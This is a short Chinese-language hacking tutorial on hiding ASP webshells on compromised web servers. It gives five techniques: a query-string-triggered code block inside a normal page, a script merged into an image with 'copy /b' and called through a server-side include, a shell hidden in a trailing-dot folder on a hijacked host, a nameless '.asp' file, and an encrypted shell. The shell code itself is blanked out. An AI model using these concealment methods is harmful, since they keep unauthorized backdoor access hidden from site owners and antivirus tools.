webshell的隐藏

[1种]

<% if request("shell")="dongxie" then %>

****************************

<% end if %>


在***********处加入你的shell代码


访问的时候在你做了手脚的ASP文件后面加上?shell=dongxie
例如:www.dongxie.cn/index.asp?action=dongxie
就可以调出webshell了，不影响正常浏览.


[2种]

把脚本插入到图片中。

<!--#include file="17789897.jpg"-->

这句话的意思：调用17789897.gif的文件

C:\创建 1.asp要查如图片的WEBSHELL 1.jpg任意图片即可

cmd中
命令: copy /b 1.asp+1.jpg 17789897.jpg



[3种]

还有一种方法
前提是得到系统权限之后,
telnet 目标IP　Port
成功telnet之后,传一个asp木马
进入网站目录
最后是在下一层吧
md s...\
copy 1.asp s.../
这样防毒软件就搞不到了
防问时http://你的肉鸡/s.../1.asp


[4种]
就是建立无文件名的.asp文件
一般管理员使用FTP维护是看不到.asp的
就算发现有WEBSHELL恢复删除整个目录文件.asp也不会被遗除
列：用WEBSHELL直接创建.asp
列2：用QQ硬盘 删除文件名只留.asp倒出即可

[5种]
其实就是加密WEBSHELL
我已经加密了一个WEBSHELL生成
原代码开始
<%……………………%>

原代码结束